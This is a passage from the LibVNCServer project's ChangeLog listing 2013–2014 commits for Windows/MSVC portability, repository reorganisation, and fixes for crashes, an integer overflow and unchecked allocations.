* libvncserver/httpd.c, libvncserver/rfbserver.c,
libvncserver/sockets.c, rfb/rfbclient.h: Generally adjusting headers
for compiling on windows without the mixing of Winsock 1 and 2.
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncserver/rfbserver.c: Just use a macro to bridge to the Win32
version of `mkdir` The additional compat_mkdir function was not necessary at all.
2014-09-20 Daniel Cohen Gindi <[email protected]>
* compat/msvc/sys/time.h: Use correct `winsock2.h` version header
instead of winsock.h. `windows.h` is referring to `winsock.h` (unless the
`WIN32_LEAN_AND_MEAN` is defined). The structs used in this header
are defined in `winsock2.h` or in `winsock.h`, but we are using
Winsock2 of course! So we have to include winsock2.h and refrain
from including windows.h here
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncserver/httpd.c, libvncserver/rfbserver.c,
libvncserver/sockets.c: Fixed a violation of the C89 standard
("declarations must come before instructions")
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncserver/tightvnc-filetransfer/filetransfermsg.c: A windows
version for directory enumerations Basically taken from https://github.com/danielgindi/FileDir with
some adjustments
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncserver/tightvnc-filetransfer/filetransfermsg.c: MSVC also
has the __FUNCTION__ predefined
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncserver/tightvnc-filetransfer/filetransfermsg.c,
libvncserver/tightvnc-filetransfer/filetransfermsg.h:
`CreateDirectory` might clash with the
`CreateDirectoryA`/`CreateDirectoryW` macros on MSVC
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncserver/tightvnc-filetransfer/filetransfermsg.c: Fail when
NULL is passed to CreateFileListInfo() Passing NULL to sprintf() would most likely crash the program.
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncclient/rfbproto.c, libvncclient/vncviewer.c,
libvncserver/rfbserver.c, libvncserver/sockets.c,
libvncserver/stats.c, libvncserver/websockets.c: `strings.h` and
`resolv.h` are not available on MSVC, and some POSIX functions are
renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a
macro mapping to the _underscored version of MSVC.
2014-09-09 Christian Beier <[email protected]>
* client_examples/Makefile.am: The HAVE_X11 define is not there
anymore, but we don't need it either.
2014-09-09 Christian Beier <[email protected]>
* Makefile.am, configure.ac, vncterm/ChangeLog, vncterm/LinuxVNC.c,
vncterm/Makefile.am, vncterm/README, vncterm/TODO,
vncterm/VNCommand.c, vncterm/VNConsole.c, vncterm/VNConsole.h,
vncterm/example.c, vncterm/vga.h: Move vncterm to
https://github.com/LibVNC/vncterm.
2014-09-09 Christian Beier <[email protected]>
* VisualNaCro/.gitignore, VisualNaCro/AUTHORS,
VisualNaCro/ChangeLog, VisualNaCro/Makefile.am, VisualNaCro/NEWS,
VisualNaCro/README, VisualNaCro/autogen.sh,
VisualNaCro/configure.ac, VisualNaCro/default8x16.h,
VisualNaCro/nacro.c, VisualNaCro/nacro.h, VisualNaCro/recorder.pl:
Move VisualNaCro to https://github.com/LibVNC/VisualNaCro.
2014-09-09 Christian Beier <[email protected]>
* prepare_x11vnc_dist.sh: Move prepare_x11vnc_dist.sh over to x11vnc
repo.
2014-09-03 Christian Beier <[email protected]>
* Makefile.am, configure.ac: Remove x11vnc from autotools build
system.
2014-09-03 Christian Beier <[email protected]>
* tightvnc-1.3dev5-vncviewer-alpha-cursor.patch: Remove
tightvnc-1.3dev5-vncviewer-alpha-cursor.patch.
2014-09-03 Christian Beier <[email protected]>
* x11vnc/.cvsignore, x11vnc/8to24.c, x11vnc/8to24.h,
x11vnc/ChangeLog, x11vnc/Makefile.am, x11vnc/README,
x11vnc/RELEASE-NOTES, x11vnc/allowed_input_t.h, x11vnc/appshare.c,
x11vnc/avahi.c, x11vnc/avahi.h, x11vnc/blackout_t.h,
x11vnc/cleanup.c, x11vnc/cleanup.h, x11vnc/connections.c,
x11vnc/connections.h, x11vnc/cursor.c, x11vnc/cursor.h,
x11vnc/enc.h, x11vnc/enums.h, x11vnc/gui.c, x11vnc/gui.h,
x11vnc/help.c, x11vnc/help.h, x11vnc/inet.c, x11vnc/inet.h,
x11vnc/keyboard.c, x11vnc/keyboard.h, x11vnc/linuxfb.c,
x11vnc/linuxfb.h, x11vnc/macosx.c, x11vnc/macosx.h,
x11vnc/macosxCG.c, x11vnc/macosxCG.h, x11vnc/macosxCGP.c,
x11vnc/macosxCGP.h, x11vnc/macosxCGS.c, x11vnc/macosxCGS.h,
x11vnc/macosx_opengl.c, x11vnc/macosx_opengl.h,
x11vnc/misc/.cvsignore, x11vnc/misc/LICENSE,
x11vnc/misc/Makefile.am, x11vnc/misc/README, x11vnc/misc/Xdummy,
x11vnc/misc/blockdpy.c, x11vnc/misc/connect_switch,
x11vnc/misc/desktop.cgi, x11vnc/misc/dtVncPopup,
x11vnc/misc/enhanced_tightvnc_viewer/COPYING,
x11vnc/misc/enhanced_tightvnc_viewer/README,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/README.txt,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/sshvnc.bat,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/tsvnc.bat,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/connect_br.tcl,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/esound/downl
oad.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/openssl/down
load.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/openssl/loca
tion.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/plink/downlo
ad.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/plink/licenc
e.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/stunnel/down
load.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/stunnel/loca
tion.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/vncviewer/do
wnload.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/info/vncviewer/lo
cation.url,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/stunnel-client.co
nf,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/stunnel-server.co
nf,
x11vnc/misc/enhanced_tightvnc_viewer/Windows/util/w98/location.url,
x11vnc/misc/enhanced_tightvnc_viewer/bin/Darwin.Power.Macintosh/.cp
over,
x11vnc/misc/enhanced_tightvnc_viewer/bin/Darwin.Power.Macintosh/vnc
viewer.sh,
x11vnc/misc/enhanced_tightvnc_viewer/bin/Darwin.i386/.cpover,
x11vnc/misc/enhanced_tightvnc_viewer/bin/sshvnc,
x11vnc/misc/enhanced_tightvnc_viewer/bin/ssvnc,
x11vnc/misc/enhanced_tightvnc_viewer/bin/ssvnc_cmd,
x11vnc/misc/enhanced_tightvnc_viewer/bin/tsvnc,
x11vnc/misc/enhanced_tightvnc_viewer/bin/util/ss_vncviewer,
x11vnc/misc/enhanced_tightvnc_viewer/bin/util/ssvnc.tcl,
x11vnc/misc/enhanced_tightvnc_viewer/bin/util/stunnel-server.conf,
x11vnc/misc/enhanced_tightvnc_viewer/build.unix,
x11vnc/misc/enhanced_tightvnc_viewer/filelist.txt,
x11vnc/misc/enhanced_tightvnc_viewer/man/man1/ssvnc.1,
x11vnc/misc/enhanced_tightvnc_viewer/man/man1/ssvncviewer.1,
x11vnc/misc/enhanced_tightvnc_viewer/src/README,
x11vnc/misc/enhanced_tightvnc_viewer/src/patches/README,
x11vnc/misc/enhanced_tightvnc_viewer/src/patches/_bundle,
x11vnc/misc/enhanced_tightvnc_viewer/src/patches/_getpatches,
x11vnc/misc/enhanced_tightvnc_viewer/src/patches/_vncpatchapplied,
x11vnc/misc/enhanced_tightvnc_viewer/src/patches/stunnel-maxconn.pa
tch,
x11vnc/misc/enhanced_tightvnc_viewer/src/patches/tight-vncviewer-fu
ll.patch,
x11vnc/misc/enhanced_tightvnc_viewer/src/patches/tight-vncviewer-fu
llscreen.patch,
x11vnc/misc/enhanced_tightvnc_viewer/src/patches/tight-vncviewer-ne
wfbsize.patch,
x11vnc/misc/enhanced_tightvnc_viewer/src/zips/README,
x11vnc/misc/enhanced_tightvnc_viewer/ssvnc.desktop,
x11vnc/misc/inet6to4, x11vnc/misc/panner.pl,
x11vnc/misc/qt_tslib_inject.pl, x11vnc/misc/ranfb.pl,
x11vnc/misc/rx11vnc, x11vnc/misc/rx11vnc.pl, x11vnc/misc/shm_clear,
x11vnc/misc/slide.pl, x11vnc/misc/turbovnc/Makefile.am,
x11vnc/misc/turbovnc/README, x11vnc/misc/turbovnc/apply_turbovnc,
x11vnc/misc/turbovnc/convert,
x11vnc/misc/turbovnc/convert_rfbserver,
x11vnc/misc/turbovnc/tight.c, x11vnc/misc/turbovnc/turbojpeg.h,
x11vnc/misc/turbovnc/undo_turbovnc, x11vnc/misc/uinput.pl,
x11vnc/misc/ultravnc_repeater.pl, x11vnc/misc/vcinject.pl,
x11vnc/misc/x11vnc_loop, x11vnc/misc/x11vnc_pw, x11vnc/nox11.h,
x11vnc/nox11_funcs.h, x11vnc/options.c, x11vnc/options.h,
x11vnc/params.h, x11vnc/pm.c, x11vnc/pm.h, x11vnc/pointer.c,
x11vnc/pointer.h, x11vnc/rates.c, x11vnc/rates.h, x11vnc/remote.c,
x11vnc/remote.h, x11vnc/scan.c, x11vnc/scan.h, x11vnc/screen.c,
x11vnc/screen.h, x11vnc/scrollevent_t.h, x11vnc/selection.c,
x11vnc/selection.h, x11vnc/solid.c, x11vnc/solid.h,
x11vnc/sslcmds.c, x11vnc/sslcmds.h, x11vnc/sslhelper.c,
x11vnc/sslhelper.h, x11vnc/ssltools.h, x11vnc/tkx11vnc,
x11vnc/tkx11vnc.h, x11vnc/uinput.c, x11vnc/uinput.h,
x11vnc/unixpw.c, x11vnc/unixpw.h, x11vnc/user.c, x11vnc/user.h,
x11vnc/userinput.c, x11vnc/userinput.h, x11vnc/util.c,
x11vnc/util.h, x11vnc/v4l.c, x11vnc/v4l.h, x11vnc/win_utils.c,
x11vnc/win_utils.h, x11vnc/winattr_t.h, x11vnc/x11vnc.1,
x11vnc/x11vnc.c, x11vnc/x11vnc.desktop, x11vnc/x11vnc.h,
x11vnc/x11vnc_defs.c, x11vnc/xdamage.c, x11vnc/xdamage.h,
x11vnc/xevents.c, x11vnc/xevents.h, x11vnc/xinerama.c,
x11vnc/xinerama.h, x11vnc/xkb_bell.c, x11vnc/xkb_bell.h,
x11vnc/xrandr.c, x11vnc/xrandr.h, x11vnc/xrecord.c,
x11vnc/xrecord.h, x11vnc/xwrappers.c, x11vnc/xwrappers.h: Remove
x11vnc subdir. The new x11vnc repo is at https://github.com/LibVNC/x11vnc.
2014-09-02 Johannes Schindelin <[email protected]>
* libvncclient/tls_openssl.c: Fix tv_usec calculation This bug was introduced in the MSVC patches. Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-29 Daniel Cohen Gindi <[email protected]>
* libvncclient/tls_openssl.c: Use Windows' critical sections to
emulate pthread's mutexes With Microsoft Visual C++, we cannot use pthreads (MinGW sports an
emulation library which is the reason we did not need
Windows-specific hacks earlier). Happily, it is very easy to provide
Windows-specific emulations for the pthread calls we use. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-29 Daniel Cohen Gindi <[email protected]>
* libvncclient/zrle.c: Perform pointer arithmetic on char * instead
of void * Microsoft Visual C++ does not allow pointer arithmetic on void
pointers. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-29 Daniel Cohen Gindi <[email protected]>
* libvncclient/tls_openssl.c, rfb/rfbproto.h: MSVC: Use the Unix
emulation headers [JES: provided commit message, split out unrelated changes] Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-29 Daniel Cohen Gindi <[email protected]>
* libvncclient/listen.c, libvncclient/sockets.c,
libvncclient/vncviewer.c: Use WIN32 for Windows-specific #ifdef
guards To support Microsoft Visual C++, we must not guard Windows-specific
code in MinGW-specific #ifdef guards. Happily, even 64-bit MSVC defines the WIN32 constant, therefore we
can use that instead. [JES: fixed commit message, reordered commit, split out unrelated
changes] Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-29 Daniel Cohen Gindi <[email protected]>
* compat/msvc/stdint.h, compat/msvc/sys/time.h,
compat/msvc/unistd.h: Add MSVC compatible unix headers The stdint.h file was copied from:
https://runexe.googlecode.com/svn-history/r9/trunk/src/runlib/msstdint.h(we can incorporate it because it is licensed under the 3-clause BSD
license.) [JES: fixed commit message, fixed stripped copyright header] Signed-off-by: Johannes Schindelin <[email protected]>
2014-09-01 Daniel Cohen Gindi <[email protected]>
* libvncclient/rfbproto.c, libvncclient/sockets.c,
libvncclient/tls_openssl.c: MSVC: Use _snprintf instead of snprintf In Microsoft's Visual C runtime, the snprintf() function is actually
called _snprintf. Let's just #define the former to call the latter. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <[email protected]>
2014-09-01 Daniel Cohen Gindi <[email protected]>
* rfb/rfbproto.h: Use correct winsock header We link to ws2_32.lib which corresponds to the winsock2.h header,
not the winsock.h header. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-29 Daniel Cohen Gindi <[email protected]>
* libvncclient/vncviewer.c: Include Winsock2 header before windows.h
include That's because there are duplicate #defines, and when Winsock2 is
defined before windows.h then windows.h detects that and prevent
redefinition. See
http://social.msdn.microsoft.com/Forums/windowsdesktop/en-US/4a90b143-1fb8-43e9-a54c-956127e0c579/windowsh-and-winsock2h?forum=windowssdk[JES: fixed commit message] Signed-off-by: Johannes Schindelin <[email protected]>
2014-09-01 Daniel Cohen Gindi <[email protected]>
* libvncclient/tls_openssl.c: Remove unused variables This change is technically not required to support MSVC, but it was
detected by Microsoft's compiler. [JES: fixed commit message] Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-26 dscho <[email protected]>
* : Merge pull request #21 from newsoft/master Fixing two more security issues (remote server crash)
2014-08-18 Nicolas Ruff <[email protected]>
* libvncserver/rfbserver.c: Check malloc() return value on
client->server ClientCutText message. Client can send up to 2**32-1
bytes of text, and such a large allocation is likely to fail in case
of high memory pressure. This would in a server crash (write at
address 0).
2014-08-16 dscho <[email protected]>
* : Merge pull request #16 from sandsmark/master Merge patches from KDE/krfb
2014-08-16 Johannes Schindelin <[email protected]>
* acinclude.m4: Fix whitespace Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-10 Luca Falavigna <[email protected]>
* acinclude.m4: Enable support for ppc64el architecture
2014-08-10 Luca Falavigna <[email protected]>
* libvncclient.pc.in, libvncserver.pc.in: Use Libs.private to avoid
unnecessary linkage
2014-08-16 Johannes Schindelin <[email protected]>
* libvncclient/rfbproto.c, libvncclient/vncviewer.c: Fix indentation Signed-off-by: Johannes Schindelin <[email protected]>
2014-08-16 dscho <[email protected]>
* : Merge pull request #20 from newsoft/master Fix integer overflow in MallocFrameBuffer()
2014-08-15 newsoft <[email protected]>
* libvncclient/vncviewer.c: Fix integer overflow in
MallocFrameBuffer() Promote integers to uint64_t to avoid integer overflow issue during
frame buffer allocation for very large screen sizes
2013-09-28 Amandeep Singh <[email protected]>
* libvncserver/sockets.c: allow rfbInitSockets with non-ready
states. This allows for reinitializations of e. g. sockets in a SHUTDOWN
state. The only state that doesn't make sense to reinitialize are
READY states.
2013-10-09 Amandeep Singh <[email protected]>
* libvncserver/main.c: Fix crash in krfb Krfb crashes on quit, if any client is connected due to a
rfbClientConnectionGone call missing
2014-07-10 Will Thompson <[email protected]>
* x11vnc/xrandr.c: x11vnc: fix double X_UNLOCK on xrandr events check_xrandr_event() assumes X_LOCK is taken before it is called,
and currently calls X_UNLOCK on behalf of the caller. But in
practice, all callers assume that the lock is still held after
check_xrandr_event() returns. In particular, this leads to a
double-unlock and crash in check_xevents() on any xrandr event.
2014-07-18 dscho <[email protected]>
* : Merge pull request #13 from
wjt/fix-double-X_UNLOCK-on-xrandr-event x11vnc: fix double X_UNLOCK on xrandr events
2014-06-27 Johannes Schindelin <[email protected]>
* common/lzoconf.h, common/lzodefs.h, common/minilzo.c,
common/minilzo.h: Update LZO to version 2.07 It was reported that LZO has security issues in LMS-2014-06-16-1: